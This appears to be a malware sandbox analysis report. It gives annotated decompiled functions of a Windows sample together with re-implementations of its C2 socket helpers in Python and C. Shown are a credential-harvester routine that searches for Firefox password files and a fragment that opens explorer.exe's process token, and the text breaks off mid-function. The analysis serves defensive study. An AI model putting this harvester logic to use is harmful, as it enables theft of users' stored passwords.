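        """E004038D0 analogue: 1 if recv() will not block, 0 on timeout."""
        if self.pending or self.closed:
            return 1
        if not self.chunks or self.chunks[0] is None:
            return 0
        nxt = self.chunks.pop(0)
        if nxt == b"":
            self.closed = True
        else:
            self.pending = nxt
        return 1

    def recv(self, n):
        """Up to n bytes; b"" models recv() == 0 (peer closed)."""
        data, self.pending = self.pending[:n], self.pending[n:]
        return data

    def send(self, data):
        taken = data[: self.max_send]
        self.sent += taken
        return len(taken)


def send_all(sock, data):
    """E00403884: 1 once all of `data` is sent, 0 if send() returns <= 0."""
    remaining = bytes(data)
    if not remaining:
        return 1
    while True:
        n = sock.send(remaining)
        if n <= 0:
            return 0
        remaining = remaining[n:]
        if not remaining:
            return 1


def recv_up_to(sock, out, length):
    """E004039A2: 1 when `length` bytes arrived OR the peer closed early
    (the sample treats EOF as a normal end), 0 on select() timeout."""
    while sock.wait_readable(WAIT_TIMEOUT):
        data = sock.recv(min(length, RECV_CHUNK))
        if not data:            # recv() == 0: peer closed -> still "success"
            return 1
        out += data             # obj->vtbl[+0x10](obj, buf, n, 0)
        length -= len(data)
        if length == 0:
            return 1
    return 0                    # E004038D0 returned 0: select() timed out


def recv_until(sock, out, max_len, terminator):
    """E00403930: one-byte recv() calls; every byte (terminator included) is
    appended to `out`; stops at the terminator or once `out` holds `max_len`
    bytes. Returns 1 only if the terminator was seen."""
    found = 0
    while sock.wait_readable(WAIT_TIMEOUT):
        data = sock.recv(1)
        if not data:            # recv() <= 0
            break
        if data[0] == terminator:
            found = 1
        out += data
        if len(out) >= max_len or found:   # E00401082(obj) vs _a12, then found
            break
    return found


def demo_exchange():
    """Constructed exchange: send a request, read a newline-terminated status
    line, then a 5-byte body that arrives in two segments."""
    sock = FakeSocket([b"OK\n", b"\x01\x02", b"\x03\x04\x05", b""])
    sent_ok = send_all(sock, b"HELLO")
    line, body = bytearray(), bytearray()
    got_line = recv_until(sock, line, 16, ord("\n"))
    got_body = recv_up_to(sock, body, 5)
    return sent_ok, bytes(sock.sent), got_line, bytes(line), got_body, bytes(body)


def demo_failure_paths():
    """Early EOF still yields 1 from recv_up_to; a select() timeout before the
    terminator yields 0 from recv_until but keeps the partial data."""
    eof = FakeSocket([b"\xaa\xbb", b""])
    partial = bytearray()
    r_eof = recv_up_to(eof, partial, 5)
    slow = FakeSocket([b"par", None])
    line = bytearray()
    r_timeout = recv_until(slow, line, 16, ord("\n"))
    return r_eof, bytes(partial), r_timeout, bytes(line)
```

Two behaviours worth noting when emulating the protocol: recv_up_to reports success when the peer closes before the requested length has arrived, so a fake server can end a response by closing the connection, and recv_until keeps whatever bytes arrived before a timeout even though it reports 0, so the caller's buffer must not be assumed empty on failure.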

                                                                    C-Code - Quality: 100%
                                                                    			// Write-until-done loop around WriteFile: keeps calling WriteFile on the
                                                                    			// remaining bytes until _a12 reaches zero. Returns 1 once the whole buffer
                                                                    			// is out, 0 if WriteFile fails or reports zero bytes written (the sample
                                                                    			// treats a zero-length write as an error rather than retrying it).
                                                                    			// _a4 = handle (file, pipe or socket), _a8 = buffer, _a12 = byte count.
                                                                    			E00401422(void* _a4, void* _a8, long _a12) {
                                                                    				long _v8;        // bytes written by the last WriteFile call
                                                                    				int _t10;
                                                                    				long _t13;
                                                                    				void* _t15;      // current write position inside _a8
                                                                    				long* _t7;       // decompiler temporary aliasing _a12
                                                                    
                                                                    				_t15 = _a8;
                                                                    				while(1) {
                                                                    					_t10 = WriteFile(_a4, _t15, _a12,  &_v8, 0); // executed
                                                                    					if(_t10 == 0 || _v8 == 0) {
                                                                    						break;
                                                                    					}
                                                                    					_t13 = _v8;
                                                                    					_t15 = _t15 + _t13;      // advance by the bytes actually written
                                                                    					_t7 =  &_a12;
                                                                    					 *_t7 = _a12 - _t13;     // and shrink the remaining length
                                                                    					if( *_t7 != 0) {
                                                                    						continue;
                                                                    					} else {
                                                                    						return 1;
                                                                    					}
                                                                    				}
                                                                    				return 0;
                                                                    			}


                                                                    APIs
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                                                                    • Instruction ID: ffb465389c342e6fff0e154865cbb03be69b4e2e252949391933a2331f5ccebc
                                                                    • Opcode Fuzzy Hash: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                                                                    • Instruction Fuzzy Hash: 71E06532510119ABCF10DE689C01FDF77A8DB50358F044126F914E61E0E7B5DF50C795
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 29%
                                                                    			// Readability check on one socket with a whole-second timeout. The locals
                                                                    			// form a Winsock fd_set (_v264 = fd_count = 1, _v260 = fd_array[0] = _a4)
                                                                    			// followed by a timeval (_v272 = tv_sec = _a8, _v268 = tv_usec = 0).
                                                                    			// L00410850 is the import thunk for select (see APIs); the pushes below
                                                                    			// are the right-to-left arguments of select(0, &readfds, NULL, NULL, &timeout).
                                                                    			// Returns 1 if the socket became readable, 0 on timeout (select == 0) or
                                                                    			// SOCKET_ERROR (-1). After the call eax holds select's return value, so the
                                                                    			// final test is really on that value, not on &_v264 as the decompiler's
                                                                    			// reuse of _t11 suggests. _a4 = SOCKET, _a8 = timeout in seconds.
                                                                    			E004038D0(intOrPtr _a4, intOrPtr _a8) {
                                                                    				void* _v260;      // fd_set.fd_array[0]
                                                                    				char _v264;       // fd_set.fd_count (really a u_int)
                                                                    				intOrPtr _v268;   // timeval.tv_usec
                                                                    				char _v272;       // timeval.tv_sec (really a long)
                                                                    				char* _t11;
                                                                    				char* _t2;
                                                                    
                                                                    				_t2 =  &_v272;
                                                                    				_push(_a8);
                                                                    				_pop( *_t2);             // tv_sec = _a8
                                                                    				_v268 = 0;               // tv_usec = 0
                                                                    				_v264 = 1;               // fd_count = 1
                                                                    				_push(_a4);
                                                                    				_pop( *__eax);           // __eax presumably = &_v260: fd_array[0] = the socket
                                                                    				_push( &_v272);          // timeout
                                                                    				_push(0);                // exceptfds
                                                                    				_push(0);                // writefds
                                                                    				_t11 =  &_v264;
                                                                    				_push(_t11);             // readfds
                                                                    				_push(0); // executed    // nfds, ignored by Winsock
                                                                    				L00410850(); // executed: select
                                                                    				if(_t11 == 0xffffffff || _t11 == 0) {
                                                                    					return 0;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}


                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: select
                                                                    • String ID:
                                                                    • API String ID: 1274211008-0
                                                                    • Opcode ID: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                                                                    • Instruction ID: 10b725986883f22aabceafb6b3feb490bf47cb93175d073b1889671c1eb66941
                                                                    • Opcode Fuzzy Hash: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                                                                    • Instruction Fuzzy Hash: 59F03075500518AEDF20CF50CC81BEABBB8EB14328F1041A2E598E52D0E7F99BC48F95
                                                                    Uniqueness Score: -1.00%
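The two helpers above, E00401422 (write the whole buffer) and E004038D0 (wait until one socket is readable), are the sample's send-side plumbing. The C program below is an added example, not code from the report or from the sample: it re-implements both on POSIX so their semantics can be exercised on a pipe. write_all, readable_within and demo_roundtrip are my own names, the payload is constructed, and the pipe stands in for the C2 socket. One porting detail it makes visible: Winsock ignores the first argument of select(), which is why the sample pushes 0, whereas POSIX needs the highest descriptor plus one.

```c
/* Added example (not from the report or the sample): POSIX re-implementation
 * of the decompiled helpers E00401422 (WriteFile loop) and E004038D0
 * (select() with a second-granularity timeout on one descriptor). */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/time.h>
#include <unistd.h>

/* Mirror of E00401422: keep writing until len bytes are out. Returns 1 on
 * success, 0 if write() fails or makes no progress (the sample treats a
 * zero-byte write as failure instead of retrying). EINTR retry is a POSIX
 * concern the Windows original does not need. */
int write_all(int fd, const void *buf, size_t len)
{
    const unsigned char *p = buf;
    while (len > 0) {
        ssize_t n = write(fd, p, len);
        if (n < 0 && errno == EINTR)
            continue;
        if (n <= 0)
            return 0;
        p   += (size_t)n;   /* advance by the bytes actually written */
        len -= (size_t)n;   /* and shrink the remaining length */
    }
    return 1;
}

/* Mirror of E004038D0: one-entry read set, timeval {timeout_sec, 0}, select
 * on readfds only. Returns 1 if fd is readable before the timeout, 0 on
 * timeout or error (the sample folds SOCKET_ERROR and 0 together). */
int readable_within(int fd, int timeout_sec)
{
    fd_set rd;
    struct timeval tv;
    int r;
    FD_ZERO(&rd);
    FD_SET(fd, &rd);
    tv.tv_sec  = timeout_sec;
    tv.tv_usec = 0;
    r = select(fd + 1, &rd, NULL, NULL, &tv);   /* nfds matters on POSIX */
    return (r == -1 || r == 0) ? 0 : 1;
}

/* Self-check on a pipe (constructed input standing in for the C2 socket):
 * the read end is not readable while empty, becomes readable after
 * write_all, and the bytes round-trip intact. Returns 1 if all of that holds. */
int demo_roundtrip(void)
{
    int p[2];
    char in[] = "constructed payload";
    char out[sizeof in];
    int ok;
    if (pipe(p) != 0)
        return 0;
    ok = readable_within(p[0], 0) == 0;          /* empty pipe: times out */
    ok = ok && write_all(p[1], in, sizeof in);
    ok = ok && readable_within(p[0], 1) == 1;    /* data pending now */
    ok = ok && read(p[0], out, sizeof out) == (ssize_t)sizeof out
            && memcmp(in, out, sizeof in) == 0;
    close(p[0]);
    close(p[1]);
    return ok;
}

int main(void)
{
    printf("roundtrip %s\n", demo_roundtrip() ? "ok" : "failed");
    return 0;
}
```

The zero-second timeout in the first readable_within call is the same trick the sample can use with _a8 = 0: a non-blocking poll of the socket. A malformed descriptor makes write_all return 0 straight away, matching the sample's early exit when WriteFile fails.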

                                                                    C-Code - Quality: 100%
                                                                    			// Program start-up stub. Despite the quality score, the loop body below is
                                                                    			// a decompiler artefact: the function is cut at 0x410630, which lies inside
                                                                    			// the call to GetTickCount listed under APIs at 0x41062F, so the first bytes
                                                                    			// are decoded out of alignment. What is reliable is the control flow:
                                                                    			// GetTickCount() -> E004105C3(tick, ...) -> ExitProcess(0); the tick count is
                                                                    			// the only input handed to E004105C3, which is therefore the main routine.
                                                                    			E00410630() {
                                                                    				signed int _t5;
                                                                    				long _t7;
                                                                    				void* _t9;
                                                                    				signed int _t10;
                                                                    				signed int _t13;
                                                                    
                                                                    				while(1) {
                                                                    					 *_t5 =  *_t5 + _t5;                                              // misaligned decode, see above
                                                                    					 *((intOrPtr*)(_t10 + 0xa)) =  *((intOrPtr*)(_t10 + 0xa)) + _t9;
                                                                    					_t13 = _t5 % _t10 - 5;
                                                                    					if(_t5 % _t10 == 5) {
                                                                    						break;
                                                                    					}
                                                                    					_t7 = GetTickCount();
                                                                    				}
                                                                    				E004105C3(_t7, _t13);
                                                                    				ExitProcess(0); // executed
                                                                    				goto ( *0x418148);   // never reached: ExitProcess does not return
                                                                    			}


                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0041062F
                                                                    • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CountExitProcessTick
                                                                    • String ID:
                                                                    • API String ID: 232575682-0
                                                                    • Opcode ID: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
                                                                    • Instruction ID: 2fc71ade2e6a0a12d312a71b131b45268222faf8461f3848b8adab9be6287053
                                                                    • Opcode Fuzzy Hash: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
                                                                    • Instruction Fuzzy Hash: 02C0123021D24099C34157618D6A7C635120B92304F1580AFD0084449399A909D2862F
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 50%
                                                                    			// Winsock initialisation: WSAStartup(0x101, &wsadata), i.e. Winsock 1.1 is
                                                                    			// requested and _v402 is the WSADATA output buffer. L00410862 is the import
                                                                    			// thunk for WSAStartup (see APIs). The decompiler returns _t2, the buffer
                                                                    			// pointer; the real return value (eax after the call) is WSAStartup's
                                                                    			// status code, 0 on success.
                                                                    			E00403FFB() {
                                                                    				char _v402;   // WSADATA
                                                                    				char* _t2;
                                                                    
                                                                    				_t2 =  &_v402;
                                                                    				_push(_t2);      // lpWSAData
                                                                    				_push(0x101); // executed: wVersionRequested = 1.1
                                                                    				L00410862(); // executed: WSAStartup
                                                                    				return _t2;
                                                                    			}


                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID:
                                                                    • API String ID: 724789610-0
                                                                    • Opcode ID: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                                                                    • Instruction ID: 067aa5936d8b9ea5f708c86def76a5f3d8c81cd5d66f0ce82ea66d37eb38fb46
                                                                    • Opcode Fuzzy Hash: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                                                                    • Instruction Fuzzy Hash: BDB0923161460826EA10A2968C479D6729C4744748F4005A13A5AD12C3EBE5AAC046EA
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 37%
                                                                    			// Fragment only: the decompiler recovered a single argument push before a
                                                                    			// call into OLE32 at absolute address 73CEC0F0 (see APIs) whose export name
                                                                    			// it could not resolve, so the body breaks off here. _t5 + 8 is most likely
                                                                    			// [ebp+8], the caller's first stack argument.
                                                                    			E00401011(void* __eax, void* __ecx) {
                                                                    				void* _t2;
                                                                    				void* _t5;
                                                                    
                                                                    				_t2 = __eax;
                                                                    				_push( *((intOrPtr*)(_t5 + 8)));
                                                                    			}


                                                                    APIs
                                                                    • 73CEC0F0.OLE32(00000000,00000001,?), ref: 00401018
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
                                                                    • Instruction ID: 6a52ffac9a52bb75e61fdc74f829c3bacd20c516bd36067e767411562a370432
                                                                    • Opcode Fuzzy Hash: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
                                                                    • Instruction Fuzzy Hash: FFA0113228020030EA20AAA08803FC828020B20B8CF008002BB08280C0C0EA80E08A28
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			// Allocation helper: LocalAlloc(0x40 = LPTR, i.e. LMEM_FIXED | LMEM_ZEROINIT,
                                                                    			// _a4 + 0x80) returns zero-filled memory with 128 bytes of slack beyond the
                                                                    			// requested size, or NULL on failure. Paired with E004018B8 for freeing.
                                                                    			E004018CF(intOrPtr _a4) {
                                                                    				void* _t4;
                                                                    
                                                                    				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
                                                                    				return _t4;
                                                                    			}


                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocLocal
                                                                    • String ID:
                                                                    • API String ID: 3494564517-0
                                                                    • Opcode ID: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                                                                    • Instruction ID: a02c1daf7142050e978c307995f6bc26c6b3feeb3ea3d743e520ab0cb6cfa48f
                                                                    • Opcode Fuzzy Hash: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                                                                    • Instruction Fuzzy Hash: 81B092B124030826E250A649C803F5A728C9B50B8CF008022BB45A6282C8A8F9A041AD
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			// Free helper matching E004018CF: LocalFree on a non-NULL pointer. Always
                                                                    			// returns 0 so callers can reset the pointer with p = E004018B8(p).
                                                                    			E004018B8(void* _a4) {
                                                                    
                                                                    				if(_a4 != 0) {
                                                                    					LocalFree(_a4); // executed
                                                                    				}
                                                                    				return 0;
                                                                    			}


                                                                    APIs
                                                                    • LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 2826327444-0
                                                                    • Opcode ID: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                                                                    • Instruction ID: 6f7800812ba96fbfdec46f28aef180318072ae253db4b629a7912724480db57a
                                                                    • Opcode Fuzzy Hash: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                                                                    • Instruction Fuzzy Hash: 64C09B7210050C55C7017E25C905B9A7AD8575034CF40C1356605555B5D6B8D6E4C5D8
                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 83%
                                                                    			// Directory walk used by the credential harvester. It builds "<_a16>\*.*"
                                                                    			// (or "<_a16>*.*" when E004025A9 reports that the path already ends in a
                                                                    			// separator), zero-fills a WIN32_FIND_DATAA via E004018E6 (0x13e = 318 bytes,
                                                                    			// the structure's size) and iterates the directory with FindFirstFileA. For
                                                                    			// each entry that is not a directory (dwFileAttributes & 0x10 == 0) it takes
                                                                    			// cFileName (offset 0x2c = _t95[0xb]) and, unless the mode flag at 0x416030
                                                                    			// equals 3, compares it with "signons.sqlite", the Firefox password store.
                                                                    			// The decompilation breaks off inside that branch.
                                                                    			E00409832(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16) {
                                                                    				struct _WIN32_FIND_DATAA _v322;
                                                                    				void* _v328;     // FindFirstFileA search handle
                                                                    				CHAR* _v332;     // search pattern, allocated by E00401DF8
                                                                    				char* _v336;     // cFileName of the current entry
                                                                    				char* _t52;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    				CHAR* _t56;
                                                                    				void* _t60;
                                                                    				char* _t64;
                                                                    				char* _t67;
                                                                    				signed int* _t74;
                                                                    				char** _t76;
                                                                    				void* _t78;
                                                                    				void* _t80;
                                                                    				char* _t88;
                                                                    				void* _t94;
                                                                    				signed int* _t95;
                                                                    				void* _t96;
                                                                    
                                                                    				_t94 = __ecx;
                                                                    				_v332 = 0;
                                                                    				_t52 = _a16;
                                                                    				if(_t52 == 0 ||  *_t52 == 0) {    // no directory given
                                                                    					L31:
                                                                    					return E004018B8(_v332);   // free the pattern (NULL-safe) and return 0
                                                                    				} else {
                                                                    					_t54 = E004025A9(_a16);   // non-zero: path already ends with a separator
                                                                    					_t55 = _t54;
                                                                    					if(_t54 != 0) {
                                                                    						_t56 = E00401DF8(_t55, _a16, "*.*");
                                                                    					} else {
                                                                    						_t56 = E00401DF8(_t55, _a16, "\*.*");
                                                                    					}
                                                                    					_v332 = _t56;
                                                                    					E004018E6( &_v322, 0x13e);   // zero the WIN32_FIND_DATAA
                                                                    					_t60 = FindFirstFileA(_v332,  &_v322);
                                                                    					_v328 = _t60;
                                                                    					if(_t60 + 1 != 0) {          // != INVALID_HANDLE_VALUE
                                                                    						do {
                                                                    							_t95 =  &_v322;
                                                                    							if(( *_t95 & 0x00000010) == 0) {   // skip FILE_ATTRIBUTE_DIRECTORY
                                                                    								_v336 =  &(_t95[0xb]);          // cFileName
                                                                    								if( *0x416030 != 3) {
                                                                    									_t64 = StrStrIA(_v336, "signons.sqlite");
                                                                    									if(_t64 != 0) {
                                                                    										E0040926B(_t94, _a4, E00401E4C(E00401DF8(_t64, _a16, "\\"), _t85, _v336), _a8, _a12);
                                                                    										_t64 = E004018B8(_t86);
                                                                    									}
                                                                    									_push(_v336);
                                                                    									L0041066A();
                                                                    									if(_t64 < 2 ||  *((short*)( &(_v336[_t64]) - 2)) != 0x732e) {
                                                                    										_push(StrStrIA(_v336, "signons.txt"));
                                                                    										_push(StrStrIA(_v336, "signons2.txt"));
                                                                    										_t67 = StrStrIA(_v336, "signons3.txt");
                                                                    										_pop(_t96);
                                                                    										_pop(_t94);
                                                                    										_t64 = _t67;
                                                                    										if(_t67 != 0 || _t96 != 0 || _t94 != 0) {
                                                                    											goto L28;
                                                                    										} else {
                                                                    											goto L29;
                                                                    										}
                                                                    									} else {
                                                                    										L28:
                                                                    										E004094D8(_a4, E00401E4C(E00401DF8(_t64, _a16, "\\"), _t68, _v336), _a8, _a12);
                                                                    										E004018B8(_t69);
                                                                    										goto L29;
                                                                    									}
                                                                    								}
                                                                    								_t88 = StrStrIA(_v336, "prefs.js");
                                                                    								_t89 = _t88;
                                                                    								if(_t88 != 0) {
                                                                    									E0040406C(_a4, E00401E4C(E00401DF8(_t89, _a16, "\\"), _t90, _v336), 0xbeef0001);
                                                                    									E004018B8(_t91);
                                                                    								}
                                                                    								goto L29;
                                                                    							}
                                                                    							_t74 =  &(_t95[0xb]);
                                                                    							_push(_t74);
                                                                    							_push(0x414f84);
                                                                    							L00410712();
                                                                    							if(_t74 != 0) {
                                                                    								_t76 =  &( &_v322->cFileName);
                                                                    								_push(_t76);
                                                                    								_push(0x414f86);
                                                                    								L00410712();
                                                                    								if(_t76 != 0) {
                                                                    									_t78 = E004025A9(_a16);
                                                                    									_t79 = _t78;
                                                                    									if(_t78 != 0) {
                                                                    										_t80 = E00401DF8(_t79, _a16, 0);
                                                                    									} else {
                                                                    										_t80 = E00401DF8(_t79, _a16, "\\");
                                                                    									}
                                                                    									E00409832(_t94, _a4, _a8, _a12, E00401E4C(_t80, _t80,  &( &_v322->cFileName)));
                                                                    									E004018B8(_t81);
                                                                    								}
                                                                    							}
                                                                    							L29:
                                                                    						} while (FindNextFileA(_v328,  &_v322) != 0);
                                                                    						FindClose(_v328);
                                                                    					}
                                                                    					goto L31;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 004098A2
                                                                    • lstrcmpi.KERNEL32(00414F84,?), ref: 004098CF
                                                                    • lstrcmpi.KERNEL32(00414F86,?), ref: 004098EC
                                                                    • FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A82
                                                                    • FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 00409A95
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                                      • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                                      • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                                      • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                    • String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                                    • API String ID: 3040542784-1405255088
                                                                    • Opcode ID: 7525ea44bccebc3fa6d54736fe600edbd5ed1fadf2fa58f406b5ffcdb9a9704d
                                                                    • Instruction ID: 67051825bcad8824e2b937691ec5a4406eb7b4ce862c3ffcbd0e68b0dcec7392
                                                                    • Opcode Fuzzy Hash: 7525ea44bccebc3fa6d54736fe600edbd5ed1fadf2fa58f406b5ffcdb9a9704d
                                                                    • Instruction Fuzzy Hash: A2513071941249BADF61BF61CC02EEE7A6AAF41308F1044BBB408711F2D6799ED0AE59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 71%
                                                                    			E00402CE7(int* __eax, void* __eflags) {
                                                                    				void* _v336;
                                                                    				void* _v340;
                                                                    				intOrPtr _v344;
                                                                    				char _v604;
                                                                    				long _v632;
                                                                    				void* _v640;
                                                                    				void* _v644;
                                                                    				int _v648;
                                                                    				int _v652;
                                                                    				void* _t32;
                                                                    				int _t35;
                                                                    				char* _t39;
                                                                    				int _t43;
                                                                    				int _t46;
                                                                    				int _t48;
                                                                    				int _t51;
                                                                    				int _t55;
                                                                    				void* _t57;
                                                                    				void* _t59;
                                                                    				int _t61;
                                                                    
                                                                    				_push(_t57);
                                                                    				_push(0x402cff);
                                                                    				asm("clc");
                                                                    				if(__eflags < 0) {
                                                                    					 *((intOrPtr*)(_t57 + 0x414aeb3d)) =  *((intOrPtr*)(_t57 + 0x414aeb3d)) + 1;
                                                                    					 *__eax = __eax +  *__eax;
                                                                    					__eflags =  *__eax;
                                                                    					if( *__eax == 0) {
                                                                    						L6:
                                                                    						__eflags = 0;
                                                                    						return 0;
                                                                    					} else {
                                                                    						__eflags =  *0x414aef;
                                                                    						if( *0x414aef == 0) {
                                                                    							goto L6;
                                                                    						} else {
                                                                    							__eflags =  *0x414b27;
                                                                    							if( *0x414b27 == 0) {
                                                                    								goto L6;
                                                                    							} else {
                                                                    								__eflags =  *0x414b2b;
                                                                    								if( *0x414b2b != 0) {
                                                                    									_t59 = 0;
                                                                    									_v344 =  *0x414aeb();
                                                                    									_v640 = 0x128;
                                                                    									_t32 = CreateToolhelp32Snapshot(2, 0);
                                                                    									__eflags = _t32 - 0xffffffff;
                                                                    									if(_t32 != 0xffffffff) {
                                                                    										_v644 = _t32;
                                                                    										_t35 = Process32First(_v644,  &_v640);
                                                                    										while(1) {
                                                                    											__eflags = _t35;
                                                                    											if(_t35 == 0) {
                                                                    												break;
                                                                    											}
                                                                    											_t39 = StrStrIA( &_v604, "explorer.exe");
                                                                    											__eflags = _t39;
                                                                    											if(_t39 == 0) {
                                                                    												L22:
                                                                    												_t35 = Process32Next(_v644,  &_v640);
                                                                    												continue;
                                                                    											} else {
                                                                    												_v648 = 0;
                                                                    												_t43 =  *0x414aef(_v632,  &_v648);
                                                                    												_t61 = _v648;
                                                                    												__eflags = _t43;
                                                                    												if(_t43 == 0) {
                                                                    													goto L22;
                                                                    												} else {
                                                                    													__eflags = _t61 - _v344;
                                                                    													if(_t61 != _v344) {
                                                                    														goto L22;
                                                                    													} else {
                                                                    														_t46 = OpenProcess(0x2000000, 0, _v632);
                                                                    														__eflags = _t46;
                                                                    														if(_t46 == 0) {
                                                                    															goto L22;
                                                                    														} else {
                                                                    															_v340 = _t46;
                                                                    															_t48 = OpenProcessToken(_v340, 0x201eb,  &_v336);
                                                                    															__eflags = _t48;
                                                                    															if(_t48 == 0) {
